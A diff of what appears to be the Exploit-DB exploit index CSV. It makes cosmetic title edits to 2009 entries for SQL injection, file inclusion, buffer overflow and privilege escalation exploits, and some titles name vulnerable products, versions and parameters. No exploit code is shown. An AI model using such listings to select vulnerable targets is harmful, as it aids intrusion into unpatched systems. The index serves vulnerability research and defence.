id,file,description,date,author,platform,type,port 8312,platforms/windows/local/8312.py,"AtomixMP3 <= 2.3 - (playlist) Universal SEH Overwrite Exploit",2009-03-30,His0k4,windows,local,0 8313,platforms/hardware/dos/8313.txt,"Check Point Firewall-1 PKI Web Service HTTP Header Remote Overflow",2009-03-30,"Bugs NotHugs",hardware,dos,0 8314,platforms/windows/dos/8314.php,"Amaya 11.1 W3C Editor/Browser (defer) Stack Overflow PoC",2009-03-30,"Alfons Luja",windows,dos,0 -8315,platforms/php/webapps/8315.txt,"gravy media cms 1.07 Multiple Vulnerabilities",2009-03-30,x0r,php,webapps,0 +8315,platforms/php/webapps/8315.txt,"gravy media cms 1.07 - Multiple Vulnerabilities",2009-03-30,x0r,php,webapps,0 8316,platforms/hardware/remote/8316.txt,"NOKIA Siemens FlexiISN 3.1 - Multiple Auth Bypass Vulnerabilities",2009-03-30,TaMBaRuS,hardware,remote,0 8317,platforms/php/webapps/8317.pl,"X-Forum 0.6.2 - Remote Command Execution Exploit",2009-03-30,Osirys,php,webapps,0 8318,platforms/php/webapps/8318.txt,"JobHut <= 1.2 (pk) Remote SQL Injection Vulnerability",2009-03-30,K-159,php,webapps,0 @@ -7842,7 +7842,7 @@ id,file,description,date,author,platform,type,port 8331,platforms/php/webapps/8331.txt,"vsp stats processor 0.45 (gamestat.php gameID) SQL Injection Vuln",2009-03-31,Dimi4,php,webapps,0 8332,platforms/windows/remote/8332.txt,"PrecisionID Datamatrix ActiveX Arbitrary File Overwrite Vuln",2009-03-31,DSecRG,windows,remote,0 8333,platforms/multiple/dos/8333.txt,"Sun Calendar Express Web Server - (DoS/XSS) Multiple Remote Vulns",2009-03-31,"Core Security",multiple,dos,0 -8334,platforms/php/webapps/8334.txt,"Koschtit Image Gallery 1.82 Multiple Local File Inclusion Vulnerabilities",2009-04-01,ahmadbady,php,webapps,0 +8334,platforms/php/webapps/8334.txt,"Koschtit Image Gallery 1.82 - Multiple Local File Inclusion Vulnerabilities",2009-04-01,ahmadbady,php,webapps,0 8335,platforms/windows/dos/8335.c,"DeepBurner 1.9.0.228 Stack Buffer Overflow (SEH) PoC",2009-04-01,"fl0 fl0w",windows,dos,0 8336,platforms/windows/remote/8336.pl,"Oracle WebLogic IIS connector JSESSIONID Remote Overflow Exploit",2009-04-01,"Guido Landi",windows,remote,0 8337,platforms/multiple/dos/8337.c,"XBMC 8.10 (GET Requests) Multiple Remote Buffer Overflow PoC",2009-04-01,n00b,multiple,dos,0 @@ -7919,7 +7919,7 @@ id,file,description,date,author,platform,type,port 8411,platforms/windows/local/8411.c,"WM Downloader 3.0.0.9 .m3u Universal Stack Overflow Exploit",2009-04-13,Stack,windows,local,0 8412,platforms/windows/local/8412.pl,"ASX to MP3 Converter 3.0.0.7 .m3u Universal Stack Overflow Exploit",2009-04-13,Stack,windows,local,0 8413,platforms/windows/local/8413.pl,"Mini-stream RM-MP3 Converter 3.0.0.7 .m3u Stack Overflow Exploit",2009-04-13,Stack,windows,local,0 -8414,platforms/php/webapps/8414.txt,"XEngineSoft PMS/MGS/NM/AMS 1.0 (Auth Bypass) SQL Injection Vulns",2009-04-13,Dr-HTmL,php,webapps,0 +8414,platforms/php/webapps/8414.txt,"XEngineSoft PMS/MGS/NM/Ams 1.0 (Auth Bypass) SQL Injection Vulns",2009-04-13,Dr-HTmL,php,webapps,0 8415,platforms/php/webapps/8415.txt,"FreznoShop 1.3.0 (id) Remote SQL Injection Vulnerability",2009-04-13,NoGe,php,webapps,0 8416,platforms/windows/local/8416.pl,"Mini-stream Ripper 3.0.1.1 .m3u Universal Stack Overflow Exploit",2009-04-13,Stack,windows,local,0 8417,platforms/php/webapps/8417.txt,"e107 Plugin userjournals_menu (blog.id) SQL Injection Vulnerability",2009-04-13,boom3rang,php,webapps,0 @@ -7938,7 +7938,7 @@ id,file,description,date,author,platform,type,port 8430,platforms/openbsd/dos/8430.py,"OpenBSD <= 4.5 IP datagram Null Pointer Deref DoS Exploit",2009-04-14,nonroot,openbsd,dos,0 8431,platforms/php/webapps/8431.txt,"GuestCal 2.1 (index.php lang) Local File Inclusion Vulnerability",2009-04-14,SirGod,php,webapps,0 8432,platforms/php/webapps/8432.txt,"Aqua CMS (username) SQL Injection Vulnerability",2009-04-14,halkfild,php,webapps,0 -8433,platforms/php/webapps/8433.txt,"RQMS (Rash) <= 1.2.2 - Multiple SQL Injection Vulnerabilities",2009-04-14,Dimi4,php,webapps,0 +8433,platforms/php/webapps/8433.txt,"RQms (Rash) <= 1.2.2 - Multiple SQL Injection Vulnerabilities",2009-04-14,Dimi4,php,webapps,0 8434,platforms/windows/dos/8434.html,"PowerCHM 5.7 (Long URL) Local Stack Overflow PoC",2009-04-14,SuB-ZeRo,windows,dos,0 8435,platforms/php/webapps/8435.txt,"W2B phpEmployment (conf.inc) File Disclosure VUlnerability",2009-04-14,InjEctOr5,php,webapps,0 8436,platforms/php/webapps/8436.txt,"Job2C 4.2 (profile) Remote Shell Upload Vulnerability",2009-04-15,InjEctOr5,php,webapps,0 @@ -7952,7 +7952,7 @@ id,file,description,date,author,platform,type,port 8444,platforms/windows/local/8444.cpp,"Star Downloader Free <= 1.45 (.dat) Universal SEH Overwrite Exploit",2009-04-15,dun,windows,local,0 8445,platforms/windows/dos/8445.pl,"Microsoft Windows Media Player - (.mid File) Integer Overflow PoC",2009-04-15,HuoFu,windows,dos,0 8446,platforms/php/webapps/8446.txt,"FreeWebshop.org 2.2.9 RC2 (lang_file) Local File Inclusion Vulnerability",2009-04-15,ahmadbady,php,webapps,0 -8447,platforms/windows/dos/8447.txt,"Zervit Webserver 0.02 Remote Buffer Overflow PoC",2009-04-15,e.wiZz!,windows,dos,0 +8447,platforms/windows/dos/8447.txt,"Zervit Webserver 0.02 - Remote Buffer Overflow PoC",2009-04-15,e.wiZz!,windows,dos,0 8448,platforms/php/webapps/8448.php,"Geeklog <= 1.5.2 - savepreferences()/*blocks[] SQL Injection Exploit",2009-04-16,Nine:Situations:Group,php,webapps,0 8449,platforms/php/webapps/8449.txt,"NetHoteles 2.0/3.0 (Auth Bypass) SQL Injection Vulnerability",2009-04-16,Dns-Team,php,webapps,0 8450,platforms/php/webapps/8450.txt,"Online Password Manager 4.1 Insecure Cookie Handling Vulnerability",2009-04-16,ZoRLu,php,webapps,0 @@ -7965,15 +7965,15 @@ id,file,description,date,author,platform,type,port 8457,platforms/php/webapps/8457.txt,"NetHoteles 3.0 (ficha.php) SQL Injection Vulnerability",2009-04-16,snakespc,php,webapps,0 8458,platforms/multiple/remote/8458.txt,"Apache Geronimo <= 2.1.3 - Multiple Directory Traversal Vulnerabilities",2009-04-16,DSecRG,multiple,remote,0 8459,platforms/php/webapps/8459.htm,"eLitius 1.0 (manage-admin.php) Add Admin/Change Password Exploit",2009-04-16,"ThE g0bL!N",php,webapps,0 -8460,platforms/php/webapps/8460.txt,"SMA-DB 0.3.13 Multiple Remote File Inclusion Vulnerabilities",2009-04-16,JosS,php,webapps,0 +8460,platforms/php/webapps/8460.txt,"SMA-DB 0.3.13 - Multiple Remote File Inclusion Vulnerabilities",2009-04-16,JosS,php,webapps,0 8461,platforms/php/webapps/8461.txt,"chCounter 3.1.3 (Login Bypass) SQL Injection Vulnerability",2009-04-16,tmh,php,webapps,0 8462,platforms/windows/dos/8462.pl,"MagicISO CCD/Cue Local Heap Overflow Exploit PoC",2009-04-16,Stack,windows,dos,0 -8463,platforms/windows/remote/8463.txt,"Zervit Webserver 0.02 Remote Directory Traversal Vulnerability",2009-04-16,e.wiZz!,windows,remote,0 +8463,platforms/windows/remote/8463.txt,"Zervit Webserver 0.02 - Remote Directory Traversal Vulnerability",2009-04-16,e.wiZz!,windows,remote,0 8464,platforms/php/webapps/8464.txt,"Tiny Blogr 1.0.0 rc4 (Auth Bypass) SQL Injection Vulnerability",2009-04-17,"Salvatore Fresta",php,webapps,0 8465,platforms/windows/dos/8465.pl,"Microsoft Media Player - (quartz.dll .mid) Denial of Service Exploit",2009-04-17,"Code Audit Labs",windows,dos,0 8466,platforms/windows/dos/8466.pl,"Microsoft GDI Plugin .png Infinite Loop Denial of Service PoC",2009-04-17,"Code Audit Labs",windows,dos,0 8467,platforms/windows/dos/8467.pl,"Microsoft Media Player - (quartz.dll .wav) Multiple Remote DoS Vulns",2009-04-17,"Code Audit Labs",windows,dos,0 -8468,platforms/php/webapps/8468.txt,"Limbo CMS 1.0.4.2 CSRF Privilege Escalation PoC",2009-04-17,"Alfons Luja",php,webapps,0 +8468,platforms/php/webapps/8468.txt,"Limbo CMS 1.0.4.2 - CSRF Privilege Escalation PoC",2009-04-17,"Alfons Luja",php,webapps,0 8469,platforms/linux/dos/8469.c,"XRDP <= 0.4.1 - Remote Buffer Overflow PoC (pre-auth)",2009-04-17,"joe walko",linux,dos,0 8470,platforms/linux/local/8470.py,"cTorrent/DTorrent (.Torrent File) Buffer Overflow Exploit",2009-04-17,"Michael Brooks",linux,local,0 8471,platforms/php/webapps/8471.txt,"ClanTiger < 1.1.1 - Multiple Cookie Handling Vulnerabilities",2009-04-17,YEnH4ckEr,php,webapps,0 @@ -7984,7 +7984,7 @@ id,file,description,date,author,platform,type,port 8476,platforms/php/webapps/8476.txt,"Online Email Manager Insecure Cookie Handling Vulnerability",2009-04-17,"Hussin X",php,webapps,0 8477,platforms/php/webapps/8477.txt,"Hot Project 7.0 - (Auth Bypass) SQL Injection Vulnerability",2009-04-17,HCOCA_MAN,php,webapps,0 8478,platforms/linux/local/8478.sh,"Linux Kernel 2.6 - UDEV Local Privilege Escalation Exploit",2009-04-20,kingcope,linux,local,0 -8479,platforms/windows/dos/8479.html,"MS Internet Explorer EMBED Memory Corruption PoC (MS09-014)",2009-04-20,Skylined,windows,dos,0 +8479,platforms/windows/dos/8479.html,"Microsoft Internet Explorer EMBED Memory Corruption PoC (MS09-014)",2009-04-20,Skylined,windows,dos,0 8480,platforms/php/webapps/8480.txt,"multi-lingual e-commerce system 0.2 - Multiple Vulnerabilities",2009-04-20,"Salvatore Fresta",php,webapps,0 8481,platforms/php/webapps/8481.txt,"Studio Lounge Address Book 2.5 (profile) Shell Upload Vulnerability",2009-04-20,JosS,php,webapps,0 8482,platforms/php/webapps/8482.txt,"Seditio CMS Events Plugin (c) Remote SQL Injection Vulnerability",2009-04-20,OoN_Boy,php,webapps,0 @@ -8004,7 +8004,7 @@ id,file,description,date,author,platform,type,port 8496,platforms/php/webapps/8496.htm,"TotalCalendar 2.4 - Remote Password Change Exploit",2009-04-20,"ThE g0bL!N",php,webapps,0 8497,platforms/php/webapps/8497.txt,"Creasito e-Commerce 1.3.16 (Auth Bypass) SQL Injection Vuln",2009-04-20,"Salvatore Fresta",php,webapps,0 8498,platforms/php/webapps/8498.txt,"eLitius 1.0 Arbitrary Database Backup Exploit",2009-04-20,"ThE g0bL!N",php,webapps,0 -8499,platforms/php/webapps/8499.php,"Dokeos LMS <= 1.8.5 (whoisonline.php) PHP Code Injection Exploit",2009-04-21,EgiX,php,webapps,0 +8499,platforms/php/webapps/8499.php,"Dokeos Lms <= 1.8.5 (whoisonline.php) PHP Code Injection Exploit",2009-04-21,EgiX,php,webapps,0 8500,platforms/windows/dos/8500.py,"Zervit Webserver 0.3 - Remote Denial of Service Exploit",2009-04-21,shinnai,windows,dos,0 8501,platforms/php/webapps/8501.txt,"CRE Loaded 6.2 (products_id) SQL Injection Vulnerability",2009-04-21,Player,php,webapps,0 8502,platforms/php/webapps/8502.txt,"pastelcms 0.8.0 (lfi/sql) Multiple Vulnerabilities",2009-04-21,SirGod,php,webapps,0 @@ -8012,13 +8012,13 @@ id,file,description,date,author,platform,type,port 8504,platforms/php/webapps/8504.txt,"NotFTP 1.3.1 - (newlang) Local File Inclusion Vulnerability",2009-04-21,Kacper,php,webapps,0 8505,platforms/php/webapps/8505.txt,"Quick.Cms.Lite 0.5 (id) Remote SQL Injection Vulnerability",2009-04-21,Player,php,webapps,0 8506,platforms/php/webapps/8506.txt,"VS PANEL 7.3.6 (Cat_ID) Remote SQL Injection Vulnerability",2009-04-21,Player,php,webapps,0 -8507,platforms/windows/dos/8507.py,"Oracle RDBMS 10.2.0.3/11.1.0.6 - TNS Listener PoC",2009-04-21,"Dennis Yurichev",windows,dos,0 +8507,platforms/windows/dos/8507.py,"Oracle RDBms 10.2.0.3/11.1.0.6 - TNS Listener PoC",2009-04-21,"Dennis Yurichev",windows,dos,0 8508,platforms/php/webapps/8508.txt,"I-Rater Pro/Plantinum 4.0 - (Auth Bypass) SQL Injection Vulnerability",2009-04-21,Hakxer,php,webapps,0 8509,platforms/php/webapps/8509.txt,"Studio Lounge Address Book 2.5 Authentication Bypass Vulnerability",2009-04-21,"ThE g0bL!N",php,webapps,0 8510,platforms/php/webapps/8510.txt,"mixedcms 1.0b (lfi/su/ab/fd) Multiple Vulnerabilities",2009-04-21,YEnH4ckEr,php,webapps,0 8511,platforms/windows/dos/8511.pl,"Xitami Web Server <= 5.0 - Remote Denial of Service Exploit",2009-04-22,"Jonathan Salwan",windows,dos,0 8512,platforms/windows/dos/8512.txt,"Counter Strike Source ManiAdminPlugin 2.0 - Remote Crash Exploit",2009-04-22,M4rt1n,windows,dos,0 -8513,platforms/php/webapps/8513.pl,"Dokeos LMS <= 1.8.5 (include) Remote Code Execution Exploit",2009-04-22,StAkeR,php,webapps,0 +8513,platforms/php/webapps/8513.pl,"Dokeos Lms <= 1.8.5 (include) Remote Code Execution Exploit",2009-04-22,StAkeR,php,webapps,0 8514,platforms/php/webapps/8514.txt,"elkagroup Image Gallery 1.0 - Arbitrary File Upload Vulnerability",2009-04-22,Securitylab.ir,php,webapps,0 8515,platforms/php/webapps/8515.txt,"5 star Rating 1.2 (Auth Bypass) SQL Injection Vulnerability",2009-04-22,zer0day,php,webapps,0 8516,platforms/php/webapps/8516.txt,"WebPortal CMS 0.8b Multiple Remote/Local File Inclusion Vulnerabilities",2009-04-22,ahmadbady,php,webapps,0 @@ -8031,7 +8031,7 @@ id,file,description,date,author,platform,type,port 8523,platforms/windows/dos/8523.txt,"Norton Ghost Support module for EasySetup wizard Remote DoS PoC",2009-04-23,shinnai,windows,dos,0 8524,platforms/windows/dos/8524.txt,"Home Web Server <= r1.7.1 (build 147) Gui Thread-Memory Corruption",2009-04-23,Aodrulez,windows,dos,0 8525,platforms/windows/remote/8525.pl,"Dream FTP Server 1.02 (users.dat) Arbitrary File Disclosure Exploit",2009-04-23,Cyber-Zone,windows,remote,0 -8526,platforms/windows/dos/8526.py,"Popcorn 1.87 Remote Heap Overflow Exploit PoC",2009-04-23,x.CJP.x,windows,dos,0 +8526,platforms/windows/dos/8526.py,"Popcorn 1.87 - Remote Heap Overflow Exploit PoC",2009-04-23,x.CJP.x,windows,dos,0 8527,platforms/windows/local/8527.py,"CoolPlayer Portable 2.19.1 - (Skin) Buffer Overflow Exploit",2009-04-23,Stack,windows,local,0 8528,platforms/asp/webapps/8528.txt,"Absolute Form Processor XE-V 1.5 (auth Bypass) SQL Injection Vuln",2009-04-24,"ThE g0bL!N",asp,webapps,0 8529,platforms/asp/webapps/8529.txt,"Absolute Form Processor XE-V 1.5 Insecure Cookie Handling Vuln",2009-04-24,ZoRLu,asp,webapps,0 @@ -8062,8 +8062,8 @@ id,file,description,date,author,platform,type,port 8554,platforms/windows/remote/8554.py,"Belkin Bulldog Plus HTTP Server Remote Buffer Overflow Exploit",2009-04-27,His0k4,windows,remote,80 8555,platforms/php/webapps/8555.txt,"ABC Advertise 1.0 Admin Password Disclosure Vulnerability",2009-04-27,SirGod,php,webapps,0 8556,platforms/linux/remote/8556.c,"Linux Kernel 2.6.x SCTP FWD Memory Corruption Remote Exploit",2009-04-28,sgrakkyu,linux,remote,0 -8557,platforms/php/webapps/8557.htm,"VisionLMS 1.0 (changePW.php) Remote Password Change Exploit",2009-04-28,Mr.tro0oqy,php,webapps,0 -8558,platforms/php/webapps/8558.txt,"MIM: InfiniX 1.2.003 Multiple SQL Injection Vulnerabilities",2009-04-28,YEnH4ckEr,php,webapps,0 +8557,platforms/php/webapps/8557.htm,"VisionLms 1.0 (changePW.php) Remote Password Change Exploit",2009-04-28,Mr.tro0oqy,php,webapps,0 +8558,platforms/php/webapps/8558.txt,"MIM: InfiniX 1.2.003 - Multiple SQL Injection Vulnerabilities",2009-04-28,YEnH4ckEr,php,webapps,0 8559,platforms/php/webapps/8559.c,"webSPELL <= 4.2.0d - Local File Disclosure Exploit (.c Linux)",2009-04-28,StAkeR,php,webapps,0 8560,platforms/windows/remote/8560.html,"Autodesk IDrop ActiveX Remote Code Execution Exploit",2009-04-28,Elazar,windows,remote,0 8561,platforms/windows/remote/8561.pl,"Quick 'n Easy Web Server 3.3.5 Arbitrary File Disclosure Exploit",2009-04-28,Cyber-Zone,windows,remote,0 @@ -8071,12 +8071,12 @@ id,file,description,date,author,platform,type,port 8563,platforms/php/webapps/8563.txt,"eLitius 1.0 (banner-details.php id) SQL Injection Vulnerability",2009-04-29,snakespc,php,webapps,0 8564,platforms/windows/remote/8564.pl,"Baby Web Server 2.7.2.0 Arbitrary File Disclosure Exploit",2009-04-29,ZoRLu,windows,remote,0 8565,platforms/php/webapps/8565.txt,"ProjectCMS 1.0b (index.php sn) Remote SQL Injection Vulnerability",2009-04-29,YEnH4ckEr,php,webapps,0 -8566,platforms/php/webapps/8566.txt,"S-Cms 1.1 Stable (page) Local File Inclusion Vulnerability",2009-04-29,ZoRLu,php,webapps,0 +8566,platforms/php/webapps/8566.txt,"S-CMS 1.1 Stable (page) Local File Inclusion Vulnerability",2009-04-29,ZoRLu,php,webapps,0 8567,platforms/php/webapps/8567.txt,"Zubrag Smart File Download 1.3 Arbitrary File Download Vulnerability",2009-04-29,Aodrulez,php,webapps,0 8568,platforms/windows/dos/8568.pl,"mpegable Player 2.12 (YUV File) Local Stack Overflow PoC",2009-04-29,GoLd_M,windows,dos,0 8569,platforms/linux/remote/8569.txt,"Adobe Reader 8.1.4/9.1 GetAnnots() Remote Code Execution Exploit",2009-04-29,Arr1val,linux,remote,0 8570,platforms/linux/remote/8570.txt,"Adobe 8.1.4/9.1 customDictionaryOpen() Code Execution Exploit",2009-04-29,Arr1val,linux,remote,0 -8571,platforms/php/webapps/8571.txt,"Tiger DMS (Auth Bypass) Remote SQL Injection Vulnerability",2009-04-29,"ThE g0bL!N",php,webapps,0 +8571,platforms/php/webapps/8571.txt,"Tiger Dms (Auth Bypass) Remote SQL Injection Vulnerability",2009-04-29,"ThE g0bL!N",php,webapps,0 8572,platforms/linux/local/8572.c,"Linux Kernel 2.6 UDEV < 141 - Local Privilege Escalation Exploit",2009-04-30,"Jon Oberheide",linux,local,0 8573,platforms/windows/dos/8573.html,"Google Chrome 1.0.154.53 (Null Pointer) Remote Crash Exploit",2009-04-30,"Aditya K Sood",windows,dos,0 8576,platforms/php/webapps/8576.pl,"Leap CMS 0.1.4 (searchterm) Blind SQL Injection Exploit",2009-04-30,YEnH4ckEr,php,webapps,0 @@ -8168,7 +8168,7 @@ id,file,description,date,author,platform,type,port 8662,platforms/windows/local/8662.py,"CastRipper 2.50.70 (.m3u) Universal Stack Overflow Exploit (py)",2009-05-12,"Super Cristal",windows,local,0 8663,platforms/windows/local/8663.pl,"CastRipper 2.50.70 (.pls) Universal Stack Overflow Exploit",2009-05-12,zAx,windows,local,0 8664,platforms/php/webapps/8664.pl,"BIGACE CMS 2.5 (username) Remote SQL Injection Exploit",2009-05-12,YEnH4ckEr,php,webapps,0 -8665,platforms/windows/dos/8665.html,"Java SE Runtime Environment - JRE 6 Update 13 Multiple Vulnerabilities",2009-05-13,shinnai,windows,dos,0 +8665,platforms/windows/dos/8665.html,"Java SE Runtime Environment - JRE 6 Update 13 - Multiple Vulnerabilities",2009-05-13,shinnai,windows,dos,0 8666,platforms/windows/remote/8666.txt,"zervit webserver 0.4 - Directory Traversal / memory corruption PoC",2009-05-13,"e.wiZz! & shinnai",windows,remote,0 8667,platforms/php/webapps/8667.txt,"TinyButStrong 3.4.0 (script) Local File Disclosure Vulnerability",2009-05-13,ahmadbady,php,webapps,0 8668,platforms/php/webapps/8668.txt,"Password Protector SD 1.3.1 Insecure Cookie Handling Vulnerability",2009-05-13,Mr.tro0oqy,php,webapps,0 @@ -8199,7 +8199,7 @@ id,file,description,date,author,platform,type,port 8694,platforms/php/webapps/8694.txt,"MRCGIGUY Top Sites 1.0.0 Insecure Cookie Handling Vuln",2009-05-14,"ThE g0bL!N",php,webapps,0 8695,platforms/multiple/dos/8695.txt,"Eggdrop/Windrop 1.6.19 ctcpbuf Remote Crash Vulnerability",2009-05-15,"Thomas Sader",multiple,dos,0 8696,platforms/hardware/remote/8696.txt,"D-Link Products Captcha Bypass Vulnerability",2009-05-15,"SourceSec Dev Team",hardware,remote,0 -8697,platforms/php/webapps/8697.txt,"Joomla Component ArtForms 2.1 b7 Remote File Inclusion Vulnerabilities",2009-05-15,iskorpitx,php,webapps,0 +8697,platforms/php/webapps/8697.txt,"Joomla Component ArtForms 2.1 b7 - Remote File Inclusion Vulnerabilities",2009-05-15,iskorpitx,php,webapps,0 8698,platforms/windows/local/8698.pl,"Audioactive Player 1.93b (.m3u) Local Buffer Overflow Exploit",2009-05-15,hack4love,windows,local,0 8699,platforms/php/webapps/8699.php,"Harland Scripts 11 Products Remote Command Execution Exploit",2009-05-15,G4N0K,php,webapps,0 8700,platforms/php/webapps/8700.txt,"Rama CMS <= 0.9.8 (download.php file) File Disclosure Vulnerability",2009-05-15,Br0ly,php,webapps,0 @@ -8214,12 +8214,12 @@ id,file,description,date,author,platform,type,port 8710,platforms/php/webapps/8710.txt,"PHP Dir Submit (Auth Bypass) SQL Injection Vulnerability",2009-05-18,snakespc,php,webapps,0 8711,platforms/php/webapps/8711.txt,"Online Rental Property Script <= 5.0 (pid) SQL Injection Vulnerability",2009-05-18,"UnderTaker HaCkEr",php,webapps,0 8712,platforms/windows/dos/8712.txt,"httpdx <= 0.5b Multiple Remote Denial of Service Vulnerabilities",2009-05-18,sico2819,windows,dos,0 -8713,platforms/php/webapps/8713.txt,"coppermine photo gallery <= 1.4.22 Multiple Vulnerabilities",2009-05-18,girex,php,webapps,0 +8713,platforms/php/webapps/8713.txt,"coppermine photo gallery <= 1.4.22 - Multiple Vulnerabilities",2009-05-18,girex,php,webapps,0 8714,platforms/php/webapps/8714.txt,"Flyspeck CMS 6.8 - Remote LFI / Change Add Admin Exploit",2009-05-18,ahmadbady,php,webapps,0 8715,platforms/php/webapps/8715.txt,"Pluck 4.6.2 (langpref) Local File Inclusion Vulnerabilities",2009-05-18,ahmadbady,php,webapps,0 8716,platforms/windows/remote/8716.py,"httpdx <= 0.5b FTP Server (USER) Remote BOF Exploit (SEH)",2009-05-18,His0k4,windows,remote,21 8717,platforms/php/webapps/8717.txt,"ClanWeb 1.4.2 - Remote Change Password / Add Admin Exploit",2009-05-18,ahmadbady,php,webapps,0 -8718,platforms/php/webapps/8718.txt,"douran portal <= 3.9.0.23 Multiple Vulnerabilities",2009-05-18,Abysssec,php,webapps,0 +8718,platforms/php/webapps/8718.txt,"douran portal <= 3.9.0.23 - Multiple Vulnerabilities",2009-05-18,Abysssec,php,webapps,0 8719,platforms/asp/webapps/8719.py,"Dana Portal Remote Change Admin Password Exploit",2009-05-18,Abysssec,asp,webapps,0 8720,platforms/multiple/dos/8720.c,"OpenSSL <= 0.9.8k / 1.0.0-beta2 - DTLS Remote Memory Exhaustion DoS",2009-05-18,"Jon Oberheide",multiple,dos,0 8721,platforms/windows/dos/8721.pl,"Zervit Webserver 0.04 (GET Request) Remote Buffer Overflow PoC",2009-05-18,Stack,windows,dos,0 @@ -8235,30 +8235,30 @@ id,file,description,date,author,platform,type,port 8733,platforms/windows/remote/8733.html,"AOL IWinAmpActiveX Class ConvertFile() Remote BOF Exploit",2009-05-19,rgod,windows,remote,0 8734,platforms/asp/webapps/8734.txt,"Namad (IMenAfzar) 2.0.0.0 - Remote File Disclosure Vulnerability",2009-05-19,Securitylab.ir,asp,webapps,0 8735,platforms/php/webapps/8735.txt,"PAD Site Scripts 3.6 Insecure Cookie Handling Vulnerability",2009-05-19,Mr.tro0oqy,php,webapps,0 -8736,platforms/php/webapps/8736.pl,"Coppermine Photo Gallery <= 1.4.22 Remote Exploit",2009-05-19,girex,php,webapps,0 +8736,platforms/php/webapps/8736.pl,"Coppermine Photo Gallery <= 1.4.22 - Remote Exploit",2009-05-19,girex,php,webapps,0 8737,platforms/php/webapps/8737.txt,"vidshare pro (sql/xss) Multiple Vulnerabilities",2009-05-19,snakespc,php,webapps,0 8738,platforms/php/webapps/8738.txt,"Dog Pedigree Online Database 1.0.1b Multiple SQL Injection Vulns",2009-05-19,YEnH4ckEr,php,webapps,0 8739,platforms/php/webapps/8739.txt,"Dog Pedigree Online Database 1.0.1b Insecure Cookie Handling Vuln",2009-05-19,YEnH4ckEr,php,webapps,0 8740,platforms/php/webapps/8740.pl,"Dog Pedigree Online Database 1.0.1b Blind SQL Injection Exploit",2009-05-19,YEnH4ckEr,php,webapps,0 8741,platforms/php/webapps/8741.txt,"DM FileManager 3.9.2 (Auth Bypass) SQL Injection Vulnerability",2009-05-19,snakespc,php,webapps,0 -8742,platforms/windows/remote/8742.txt,"KingSoft Web Shield <= 1.1.0.62 XSS/Code Execution Vulnerability",2009-05-19,inking,windows,remote,0 +8742,platforms/windows/remote/8742.txt,"KingSoft Web Shield <= 1.1.0.62 - XSS/Code Execution Vulnerability",2009-05-19,inking,windows,remote,0 8743,platforms/php/webapps/8743.txt,"Joomla Casino 0.3.1 - Multiple SQL Injection Exploits",2009-05-20,ByALBAYX,php,webapps,0 8744,platforms/php/webapps/8744.txt,"exjune officer message system 1 - Multiple Vulnerabilities",2009-05-20,ByALBAYX,php,webapps,0 8745,platforms/php/webapps/8745.txt,"catviz 0.4.0b1 (lfi/xss) Multiple Vulnerabilities",2009-05-20,ByALBAYX,php,webapps,0 -8746,platforms/php/webapps/8746.txt,"NC GBook 1.0 - Remote Command injection Exploit",2009-05-20,"ThE g0bL!N",php,webapps,0 +8746,platforms/php/webapps/8746.txt,"NC GBook 1.0 - Remote Command Injection Exploit",2009-05-20,"ThE g0bL!N",php,webapps,0 8747,platforms/php/webapps/8747.txt,"NC LinkList 1.3.1 - Remote Command Injection Exploit",2009-05-20,"ThE g0bL!N",php,webapps,0 8748,platforms/php/webapps/8748.txt,"Realty Web-Base 1.0 (list_list.php id) SQL Injection Vulnerability",2009-05-20,"ThE g0bL!N",php,webapps,0 8749,platforms/asp/webapps/8749.txt,"DMXReady Registration Manager 1.1 - Arbitrary File Upload Vulnerability",2009-05-20,Securitylab.ir,asp,webapps,0 8750,platforms/php/webapps/8750.txt,"PHP Article Publisher Arbitrary Auth Bypass Vulnerability",2009-05-20,"ThE g0bL!N",php,webapps,0 8751,platforms/php/webapps/8751.txt,"bSpeak 1.10 (forumid) Remote Blind SQL Injection Vulnerability",2009-05-20,snakespc,php,webapps,0 -8752,platforms/php/webapps/8752.txt,"Jorp 1.3.05.09 Remote Arbitrary Remove Projects/Tasks Vulnerabilities",2009-05-20,YEnH4ckEr,php,webapps,0 +8752,platforms/php/webapps/8752.txt,"Jorp 1.3.05.09 - Remote Arbitrary Remove Projects/Tasks Vulnerabilities",2009-05-20,YEnH4ckEr,php,webapps,0 8753,platforms/osx/remote/8753.txt,"Mac OS X - Java applet Remote Deserialization Remote PoC (updated)",2009-05-20,"Landon Fuller",osx,remote,0 8754,platforms/windows/remote/8754.patch,"Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Exploit (patch)",2009-05-21,"Ron Bowes/Andrew Orr",windows,remote,0 8755,platforms/php/webapps/8755.txt,"VICIDIAL 2.0.5-173 (Auth Bypass) SQL Injection Vulnerability",2009-05-21,Striker7,php,webapps,0 8756,platforms/asp/webapps/8756.txt,"asp inline corporate calendar (sql/xss) Multiple Vulnerabilities",2009-05-21,Bl@ckbe@rD,asp,webapps,0 8757,platforms/windows/remote/8757.html,"BaoFeng (config.dll) ActiveX Remote Code Execution Exploit",2009-05-21,etirah,windows,remote,0 8758,platforms/windows/remote/8758.html,"ChinaGames (CGAgent.dll) ActiveX Remote Code Execution Exploit",2009-05-21,etirah,windows,remote,0 -8759,platforms/php/webapps/8759.txt,"Flash Quiz Beta 2 Multiple Remote SQL Injection Vulnerabilities",2009-05-21,YEnH4ckEr,php,webapps,0 +8759,platforms/php/webapps/8759.txt,"Flash Quiz Beta 2 - Multiple Remote SQL Injection Vulnerabilities",2009-05-21,YEnH4ckEr,php,webapps,0 8761,platforms/php/webapps/8761.txt,"Article Directory (Auth Bypass) SQL Injection Vulnerability",2009-05-21,Hakxer,php,webapps,0 8762,platforms/php/webapps/8762.txt,"Article Directory (page.php) Remote Blind SQL Injection Vulnerability",2009-05-21,"ThE g0bL!N",php,webapps,0 8763,platforms/php/webapps/8763.txt,"ZaoCMS Insecure Cookie Handling Vulnerability",2009-05-21,"ThE g0bL!N",php,webapps,0 @@ -8273,7 +8273,7 @@ id,file,description,date,author,platform,type,port 8773,platforms/php/webapps/8773.txt,"ZaoCMS (PhpCommander) Arbitary Remote File Upload Vulnerability",2009-05-22,Qabandi,php,webapps,0 8774,platforms/php/webapps/8774.htm,"Mole Group Sky Hunter/Bus Ticket Scripts Change Admin Pass Exploit",2009-05-22,G4N0K,php,webapps,0 8775,platforms/php/webapps/8775.txt,"Mole Group Restaurant Directory Script 3.0 Change Admin Pass Vuln",2009-05-22,G4N0K,php,webapps,0 -8776,platforms/php/webapps/8776.txt,"photovideotube 1.11 Multiple Vulnerabilities",2009-05-22,Hakxer,php,webapps,0 +8776,platforms/php/webapps/8776.txt,"photovideotube 1.11 - Multiple 